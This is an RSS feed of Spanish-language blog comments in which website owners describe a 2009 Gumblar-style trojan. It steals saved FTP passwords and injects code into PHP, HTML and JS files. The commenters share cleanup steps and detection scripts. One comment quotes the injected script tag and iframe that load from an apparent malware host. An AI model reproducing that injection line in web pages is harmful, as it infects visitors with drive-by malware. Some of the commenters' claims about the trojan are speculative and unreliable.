<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	>
<channel>
	<title>Comentarios en: Ayer matamos a un virus-troyano desconocido que hemos llamado &#8220;Kytten&#8221;</title>
	<atom:link href="http://www.solosequenosenada.com/2009/10/11/ayer-nos-metieron-un-virus-troyano-desconocido-llamado-kytten/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.solosequenosenada.com/2009/10/11/ayer-nos-metieron-un-virus-troyano-desconocido-llamado-kytten/</link>
	<description>Una web para personas curiosas y peculiares</description>
	<pubDate>Wed, 08 Sep 2010 13:38:43 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.7.1</generator>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		<item>
		<title>Por: Socrates</title>
		<link>http://www.solosequenosenada.com/2009/10/11/ayer-nos-metieron-un-virus-troyano-desconocido-llamado-kytten/comment-page-1/#comment-3339</link>
		<dc:creator>Socrates</dc:creator>
		<pubDate>Thu, 27 May 2010 01:04:34 +0000</pubDate>
		<guid isPermaLink="false">http://www.solosequenosenada.com/?p=847#comment-3339</guid>
		<description>Depende de la versión de virus y depende de otras cosas, el virus decide a veces infectar unos archivos y a veces no. Pregúntaselo al autor de virus (en china).</description>
		<content:encoded><![CDATA[<p>Depende de la versión de virus y depende de otras cosas, el virus decide a veces infectar unos archivos y a veces no. Pregúntaselo al autor de virus (en china).</p>
]]></content:encoded>
	</item>
	<item>
		<title>Por: Annariel</title>
		<link>http://www.solosequenosenada.com/2009/10/11/ayer-nos-metieron-un-virus-troyano-desconocido-llamado-kytten/comment-page-1/#comment-3327</link>
		<dc:creator>Annariel</dc:creator>
		<pubDate>Mon, 24 May 2010 23:07:23 +0000</pubDate>
		<guid isPermaLink="false">http://www.solosequenosenada.com/?p=847#comment-3327</guid>
		<description>Hola

Lograron limpiar su web? Porque yo he limpiado todos los .php, pero no encuentro nada en los js ni en los html; y sin embargo se sigue llenando el cache y viendose mal las demás paginas que no son el frontpage

Alguna solución?</description>
		<content:encoded><![CDATA[<p>Hola</p>
<p>Lograron limpiar su web? Porque yo he limpiado todos los .php, pero no encuentro nada en los js ni en los html; y sin embargo se sigue llenando el cache y viendose mal las demás paginas que no son el frontpage</p>
<p>Alguna solución?</p>
]]></content:encoded>
	</item>
	<item>
		<title>Por: Pedro Novellon &#187; Gumblar, un virus que ataca a servidores web</title>
		<link>http://www.solosequenosenada.com/2009/10/11/ayer-nos-metieron-un-virus-troyano-desconocido-llamado-kytten/comment-page-1/#comment-3305</link>
		<dc:creator>Pedro Novellon &#187; Gumblar, un virus que ataca a servidores web</dc:creator>
		<pubDate>Mon, 17 May 2010 17:23:19 +0000</pubDate>
		<guid isPermaLink="false">http://www.solosequenosenada.com/?p=847#comment-3305</guid>
		<description>[...] Soluciones al Gumblar [...]</description>
		<content:encoded><![CDATA[<p>[...] Soluciones al Gumblar [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>Por: Celio Castro</title>
		<link>http://www.solosequenosenada.com/2009/10/11/ayer-nos-metieron-un-virus-troyano-desconocido-llamado-kytten/comment-page-1/#comment-3086</link>
		<dc:creator>Celio Castro</dc:creator>
		<pubDate>Thu, 01 Apr 2010 19:52:14 +0000</pubDate>
		<guid isPermaLink="false">http://www.solosequenosenada.com/?p=847#comment-3086</guid>
		<description>Tambien fui victima de este virus,  como en un post anterior, mis respetos para los programadores o programadora, pero como fastidian...

aqui describo la eliminacion y el funcionamiento del virus, si en algo ando mal, bienvenidos los comentarios.

Descripcion:
La infecion es a nivel FTP, aun que es probable, que la infecion se produzca por medio de inyeccion de codigo en servidores LINUX es muy dificil ya que estos servidores estan preparados para rechazar ese tipo de inyecciones, pero pude ser en algunos casos.

a mi me paso a nivel FTP.
al iniciar mi computadora, me epece a dar cuenta que corrian unos programas en background
DLLHOST corriendo en C y ejecutado por el usuario actual CASTROPC, al ejecutarse este archivo, la pc se alentaba de cierta manera, hasta que el proceso terminaba.

El programa estaba haciendo una conexion FTP, a mihosting y actulizando los archivos.

asi que me di a la tarea de limpiar todos los archivos, PHP, HTML, HTM, JS, una vez limpios, al paso de un par de horas, la infeccion estaba de  vuelta, aun cuando cambiaba las contraseñas del Hosting.

Cuando cabiaba las contraseñas, al dream, le escribia la contraña y la guardaba, el virus recuperaba esa contraseña del registro, y al poco rato volvia a ejecutarse y cada vez, y ya era un fastidio ya que no podia trabjar y google, ya me tania catalogado como portador del virus.

PASOS PARA DESINFECTAR.
1.- bajar una copia del sitio a la pc
limpiar todos los archivos de los posibles linas de codigo infectadas, revisar despues de  y al final de los archivos JS.

2.- una vez limpios los archivos, cabiar la contraseña del hosting.

3.- una vez cambiada, reiniciar la pc, dejar que se ejecuten todas las aplicaciones normalmente, el virus no podra conectarse, ya que no va a localizar en el registro la ultima contraseña.

4.- no abrir el dreamweaber ni cualquier otro programa de FTP, ya que estos guardan las contraseñas en un registro en la PC, y el virus tiene registrados los 10 mas populares clientes de FTP.

5.- la nueva contraseña, ponerla en un archivo de texto, cosa muy importante esa saber que este virus, copia todas las entradas del teclado, asi que es mejor copiar y pegar las contraseñas, para no escribirlas.

6.- Conectarse por medio de ftp.usuario@pagina.com, desde el browser o por medio del CPANEL en la seccion de archivos, por alli puede hacer el UPLOAD nuevamente. recordar que si se conectan de esta forma, no guarden la contraseña, por que si no va a ser la misma cosa nuevamente, para escribir la contraseña en estas opciones, copialas y pegalas desde el TXT previo.

7.- incia a actulizar tuwebsite, no tendras probremas de infeccion nuevamente

ULTIMO PASO.
sugiero que la pc se formatee, para que la tengas limpia de todo virus posble.

IMPORTANTE.
este virus ademas de copiar todo lo que se escribe por el teclado y de usar el ftp para infectar, usa la VM para ejecutar codigo background.

CUALES SON LOS FINES DEL VIRUS.
a mi punto de vista, es una botnet, sus obejetivos son el envio de spam y el de un ataque masivo a ciertos servidores.

si se dan cuenta, afecta muchso servidores bajo LINUX/CPANEL, ESTOS SERVIDORES USAN LA FUNCION mail() y la mayoria no estan de estos servidores estan expuestos a estos ataques, asi qeu una inyeccion de codigo PHP, como han de saber igual que ami a ustedes me imagino que sus archivos php, al inicio hay una lina cifrada, ANALICEN ESA LINEA. EVAL(...(....))
si tienen acceso al exim de su servidor, veran como la actividad del mismo Exim, aumenta justo al ajecutar uno de los archivos infectados.

SIGNIFICA QUE ESTA ENVIANDO EMAIL
Seguramente, a de tener conexion remota a una base de datos, donde tomas las listas de mails, para hacer su proceso.

EL ATAQUE MASIVO.
no estoy seguro que se ejecute, pero casi un 70% de seguridad qeu si lo hace.

estos son mis comentarios, cualquier cosa a sus ordenes, mi email, celio_castro@hotmail.com</description>
		<content:encoded><![CDATA[<p>Tambien fui victima de este virus,  como en un post anterior, mis respetos para los programadores o programadora, pero como fastidian&#8230;</p>
<p>aqui describo la eliminacion y el funcionamiento del virus, si en algo ando mal, bienvenidos los comentarios.</p>
<p>Descripcion:<br />
La infecion es a nivel FTP, aun que es probable, que la infecion se produzca por medio de inyeccion de codigo en servidores LINUX es muy dificil ya que estos servidores estan preparados para rechazar ese tipo de inyecciones, pero pude ser en algunos casos.</p>
<p>a mi me paso a nivel <a href="http://FTP" rel="nofollow">http://FTP</a>.<br />
al iniciar mi computadora, me epece a dar cuenta que corrian unos programas en background<br />
DLLHOST corriendo en C y ejecutado por el usuario actual CASTROPC, al ejecutarse este archivo, la pc se alentaba de cierta manera, hasta que el proceso terminaba.</p>
<p>El programa estaba haciendo una conexion FTP, a mihosting y actulizando los archivos.</p>
<p>asi que me di a la tarea de limpiar todos los archivos, PHP, HTML, HTM, JS, una vez limpios, al paso de un par de horas, la infeccion estaba de  vuelta, aun cuando cambiaba las contraseñas del Hosting.</p>
<p>Cuando cabiaba las contraseñas, al dream, le escribia la contraña y la guardaba, el virus recuperaba esa contraseña del registro, y al poco rato volvia a ejecutarse y cada vez, y ya era un fastidio ya que no podia trabjar y google, ya me tania catalogado como portador del virus.</p>
<p>PASOS PARA DESINFECTAR.<br />
1.- bajar una copia del sitio a la pc<br />
limpiar todos los archivos de los posibles linas de codigo infectadas, revisar despues de  y al final de los archivos JS.</p>
<p>2.- una vez limpios los archivos, cabiar la contraseña del hosting.</p>
<p>3.- una vez cambiada, reiniciar la pc, dejar que se ejecuten todas las aplicaciones normalmente, el virus no podra conectarse, ya que no va a localizar en el registro la ultima contraseña.</p>
<p>4.- no abrir el dreamweaber ni cualquier otro programa de FTP, ya que estos guardan las contraseñas en un registro en la PC, y el virus tiene registrados los 10 mas populares clientes de <a href="http://FTP" rel="nofollow">http://FTP</a>.</p>
<p>5.- la nueva contraseña, ponerla en un archivo de texto, cosa muy importante esa saber que este virus, copia todas las entradas del teclado, asi que es mejor copiar y pegar las contraseñas, para no escribirlas.</p>
<p>6.- Conectarse por medio de <a href="http://ftp.usuario@pagina.com" rel="nofollow">http://ftp.usuario@pagina.com</a>, desde el browser o por medio del CPANEL en la seccion de archivos, por alli puede hacer el UPLOAD nuevamente. recordar que si se conectan de esta forma, no guarden la contraseña, por que si no va a ser la misma cosa nuevamente, para escribir la contraseña en estas opciones, copialas y pegalas desde el TXT previo.</p>
<p>7.- incia a actulizar tuwebsite, no tendras probremas de infeccion nuevamente</p>
<p>ULTIMO PASO.<br />
sugiero que la pc se formatee, para que la tengas limpia de todo virus posble.</p>
<p>IMPORTANTE.<br />
este virus ademas de copiar todo lo que se escribe por el teclado y de usar el ftp para infectar, usa la VM para ejecutar codigo background.</p>
<p>CUALES SON LOS FINES DEL VIRUS.<br />
a mi punto de vista, es una botnet, sus obejetivos son el envio de spam y el de un ataque masivo a ciertos servidores.</p>
<p>si se dan cuenta, afecta muchso servidores bajo LINUX/CPANEL, ESTOS SERVIDORES USAN LA FUNCION mail() y la mayoria no estan de estos servidores estan expuestos a estos ataques, asi qeu una inyeccion de codigo PHP, como han de saber igual que ami a ustedes me imagino que sus archivos php, al inicio hay una lina cifrada, ANALICEN ESA LINEA. EVAL(&#8230;(&#8230;.))<br />
si tienen acceso al exim de su servidor, veran como la actividad del mismo Exim, aumenta justo al ajecutar uno de los archivos infectados.</p>
<p>SIGNIFICA QUE ESTA ENVIANDO EMAIL<br />
Seguramente, a de tener conexion remota a una base de datos, donde tomas las listas de mails, para hacer su proceso.</p>
<p>EL ATAQUE MASIVO.<br />
no estoy seguro que se ejecute, pero casi un 70% de seguridad qeu si lo hace.</p>
<p>estos son mis comentarios, cualquier cosa a sus ordenes, mi email, <a href="mailto:celio_castro@hotmail.com">celio_castro@hotmail.com</a></p>
]]></content:encoded>
	</item>
	<item>
		<title>Por: Cristian Aguirre</title>
		<link>http://www.solosequenosenada.com/2009/10/11/ayer-nos-metieron-un-virus-troyano-desconocido-llamado-kytten/comment-page-1/#comment-2921</link>
		<dc:creator>Cristian Aguirre</dc:creator>
		<pubDate>Sat, 20 Feb 2010 15:22:57 +0000</pubDate>
		<guid isPermaLink="false">http://www.solosequenosenada.com/?p=847#comment-2921</guid>
		<description>He sido victima tambien. Muy lindo el codiguito de estos hackers. 
Un detalle muy importante a tener en cuenta:
He revisado y hay que tener mucho detalle en el tema busqueda y eliminacion del codigo malicioso.
Segun lo que he observado a nivel archivos, el codigo infecta automaticamente todos los archivos .html y .js. 
Tener en cuenta de revisar todos los archivos asignados a su cuenta de hosting, desde el path / en adelante. He visto que se infectan hasta los html fuera de public_html. Como por ej archivos de estadisticas html generados.

Tambien otro aporte es que se inserta un archivo php generalmente en las carpetas de imagenes.

Me acuerdo haber encontrado tambien un tutorial de hackeo de servidores para ejecutar codigos de servidor externos a un dominio por medio de pase de doble ? por GET. Ahora no lo puedo encontrar para decirles bien como era la modalidad.</description>
		<content:encoded><![CDATA[<p>He sido victima tambien. Muy lindo el codiguito de estos hackers.<br />
Un detalle muy importante a tener en cuenta:<br />
He revisado y hay que tener mucho detalle en el tema busqueda y eliminacion del codigo malicioso.<br />
Segun lo que he observado a nivel archivos, el codigo infecta automaticamente todos los archivos .html y .js.<br />
Tener en cuenta de revisar todos los archivos asignados a su cuenta de hosting, desde el path / en adelante. He visto que se infectan hasta los html fuera de public_html. Como por ej archivos de estadisticas html generados.</p>
<p>Tambien otro aporte es que se inserta un archivo php generalmente en las carpetas de imagenes.</p>
<p>Me acuerdo haber encontrado tambien un tutorial de hackeo de servidores para ejecutar codigos de servidor externos a un dominio por medio de pase de doble ? por GET. Ahora no lo puedo encontrar para decirles bien como era la modalidad.</p>
]]></content:encoded>
	</item>
	<item>
		<title>Por: kriy</title>
		<link>http://www.solosequenosenada.com/2009/10/11/ayer-nos-metieron-un-virus-troyano-desconocido-llamado-kytten/comment-page-1/#comment-2765</link>
		<dc:creator>kriy</dc:creator>
		<pubDate>Thu, 03 Dec 2009 19:11:00 +0000</pubDate>
		<guid isPermaLink="false">http://www.solosequenosenada.com/?p=847#comment-2765</guid>
		<description>ahí va una versión con otro servidor...

las líneas de mis paginas asp y html son:

"script src=http://skpasoh3.edu-my.net/alumni/robots_old.php &gt;&lt;/script"

Esta web te devuelve lo siguiente entre tags de script y encriptado para crear el siguiente Iframe:
iframe src=\"http://skpasoh3.edu-my.net/alumni/robots_old.php?s=s2BeiIpCl&amp;id="+a+"\"

a intentar limpiar el servidor...</description>
		<content:encoded><![CDATA[<p>ahí va una versión con otro servidor&#8230;</p>
<p>las líneas de mis paginas asp y html son:</p>
<p>&#8220;script src=http://skpasoh3.edu-my.net/alumni/robots_old.php &gt;&lt;/script&#8221;</p>
<p>Esta web te devuelve lo siguiente entre tags de script y encriptado para crear el siguiente Iframe:<br />
iframe src=\&#8221;http://skpasoh3.edu-my.net/alumni/robots_old.php?s=s2BeiIpCl&amp;id=&#8221;+a+&#8221;\&#8221;</p>
<p>a intentar limpiar el servidor&#8230;</p>
]]></content:encoded>
	</item>
	<item>
		<title>Por: jldalla</title>
		<link>http://www.solosequenosenada.com/2009/10/11/ayer-nos-metieron-un-virus-troyano-desconocido-llamado-kytten/comment-page-1/#comment-2763</link>
		<dc:creator>jldalla</dc:creator>
		<pubDate>Wed, 02 Dec 2009 04:28:26 +0000</pubDate>
		<guid isPermaLink="false">http://www.solosequenosenada.com/?p=847#comment-2763</guid>
		<description>Hola.
Yo he hecho algunos scripts en bash que nos permite detectar si hay archivos "infectados" y curarlos.
Los scripts los pueden ver (y proponer mejoras) en:
http://paste.debian.net/52926/
http://paste.debian.net/52927/

Saludos a todos. Espero que sirva.

José Luis, Neuquén, Argentina.</description>
		<content:encoded><![CDATA[<p>Hola.<br />
Yo he hecho algunos scripts en bash que nos permite detectar si hay archivos &#8220;infectados&#8221; y curarlos.<br />
Los scripts los pueden ver (y proponer mejoras) en:<br />
<a href="http://paste.debian.net/52926/" rel="nofollow">http://paste.debian.net/52926/</a><br />
<a href="http://paste.debian.net/52927/" rel="nofollow">http://paste.debian.net/52927/</a></p>
<p>Saludos a todos. Espero que sirva.</p>
<p>José Luis, Neuquén, Argentina.</p>
]]></content:encoded>
	</item>
	<item>
		<title>Por: Socrates</title>
		<link>http://www.solosequenosenada.com/2009/10/11/ayer-nos-metieron-un-virus-troyano-desconocido-llamado-kytten/comment-page-1/#comment-2751</link>
		<dc:creator>Socrates</dc:creator>
		<pubDate>Thu, 26 Nov 2009 22:50:32 +0000</pubDate>
		<guid isPermaLink="false">http://www.solosequenosenada.com/?p=847#comment-2751</guid>
		<description>No dices nada sobre si habéis cambiado el password del "FTP".

En mi caso he tenido problemas durante muchos meses hasta que cambié el password del "FTP" y (IMPORTANTE) no guardo la contraseña. O sea, en el cliente de "FTP" creo la cuenta con todos los datos de conexión menos la contraseña.

Es tedioso porque hay que teclearla cada vez que me conecto por "FTP", pero desde que lo hago así, todas mis webs están "sanas". 

El "FTP" encriptado está bien para que no intercepten el password, pero si guardas la contraseña (sin encriptar) en el disco duro, de poco te servirá.

Según tengo entendido, el "proceso" del que hablas sólo busca ficheros con claves y passwords (en texto plano) por el disco duro, pero no tiene la capacidad de "keylogger" (por el momento, que estos chinos se las saben todas). Pero si tienes otras informaciones, por favor, no dudes en comunicarlo por aquí que siempre va bien ampliar conocimientos sobre el "bicho" este de las narices. ;)</description>
		<content:encoded><![CDATA[<p>No dices nada sobre si habéis cambiado el password del &#8220;FTP&#8221;.</p>
<p>En mi caso he tenido problemas durante muchos meses hasta que cambié el password del &#8220;FTP&#8221; y (IMPORTANTE) no guardo la contraseña. O sea, en el cliente de &#8220;FTP&#8221; creo la cuenta con todos los datos de conexión menos la contraseña.</p>
<p>Es tedioso porque hay que teclearla cada vez que me conecto por &#8220;FTP&#8221;, pero desde que lo hago así, todas mis webs están &#8220;sanas&#8221;. </p>
<p>El &#8220;FTP&#8221; encriptado está bien para que no intercepten el password, pero si guardas la contraseña (sin encriptar) en el disco duro, de poco te servirá.</p>
<p>Según tengo entendido, el &#8220;proceso&#8221; del que hablas sólo busca ficheros con claves y passwords (en texto plano) por el disco duro, pero no tiene la capacidad de &#8220;keylogger&#8221; (por el momento, que estos chinos se las saben todas). Pero si tienes otras informaciones, por favor, no dudes en comunicarlo por aquí que siempre va bien ampliar conocimientos sobre el &#8220;bicho&#8221; este de las narices. <img src='http://www.solosequenosenada.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
]]></content:encoded>
	</item>
	<item>
		<title>Por: JOANB</title>
		<link>http://www.solosequenosenada.com/2009/10/11/ayer-nos-metieron-un-virus-troyano-desconocido-llamado-kytten/comment-page-1/#comment-2750</link>
		<dc:creator>JOANB</dc:creator>
		<pubDate>Thu, 26 Nov 2009 22:14:53 +0000</pubDate>
		<guid isPermaLink="false">http://www.solosequenosenada.com/?p=847#comment-2750</guid>
		<description>Nosotros estamos teniendo este problema. Hemos dejado un log de "ftp" para analizar cosas y observamos que en diferentes momentos del dia y de diferentes ips de conectan via "ftp" a nuestro servidor, se descargan los archivos (comando RETR)de la web limpios y los vuelven a subir infectados (comando STOR). Por tanto entendemos que algun proceso detecta usuarios y passwords de "ftp" que luego de alguna manera envian y del exterior utilizan para conectarse como administradores (por eso buscan los 10 mas utilizados) y infectar toda la web de manera alfabetica poque asi les bajan los archivos desde el "ftp" (comando LIST). Lo dificil es evitar que espien el "ftp" para capturar los usuarios y passwords. Se deberian utilizar encriptacion y "ftps" en lugar de "ftp".</description>
		<content:encoded><![CDATA[<p>Nosotros estamos teniendo este problema. Hemos dejado un log de &#8220;ftp&#8221; para analizar cosas y observamos que en diferentes momentos del dia y de diferentes ips de conectan via &#8220;ftp&#8221; a nuestro servidor, se descargan los archivos (comando RETR)de la web limpios y los vuelven a subir infectados (comando STOR). Por tanto entendemos que algun proceso detecta usuarios y passwords de &#8220;ftp&#8221; que luego de alguna manera envian y del exterior utilizan para conectarse como administradores (por eso buscan los 10 mas utilizados) y infectar toda la web de manera alfabetica poque asi les bajan los archivos desde el &#8220;ftp&#8221; (comando LIST). Lo dificil es evitar que espien el &#8220;ftp&#8221; para capturar los usuarios y passwords. Se deberian utilizar encriptacion y &#8220;ftps&#8221; en lugar de &#8220;ftp&#8221;.</p>
]]></content:encoded>
	</item>
	<item>
		<title>Por: Socrates</title>
		<link>http://www.solosequenosenada.com/2009/10/11/ayer-nos-metieron-un-virus-troyano-desconocido-llamado-kytten/comment-page-1/#comment-2726</link>
		<dc:creator>Socrates</dc:creator>
		<pubDate>Sat, 31 Oct 2009 23:59:40 +0000</pubDate>
		<guid isPermaLink="false">http://www.solosequenosenada.com/?p=847#comment-2726</guid>
		<description>2Contact, el Flashfxp escribe sus datos en texto plano, por tanto, también es vulnerable a este bicho.

¿Alguien sabe de un buen cliente de FTP, gratis, y que encripte bien sus datos?</description>
		<content:encoded><![CDATA[<p>2Contact, el Flashfxp escribe sus datos en texto plano, por tanto, también es vulnerable a este bicho.</p>
<p>¿Alguien sabe de un buen cliente de FTP, gratis, y que encripte bien sus datos?</p>
]]></content:encoded>
	</item>
</channel>
</rss>
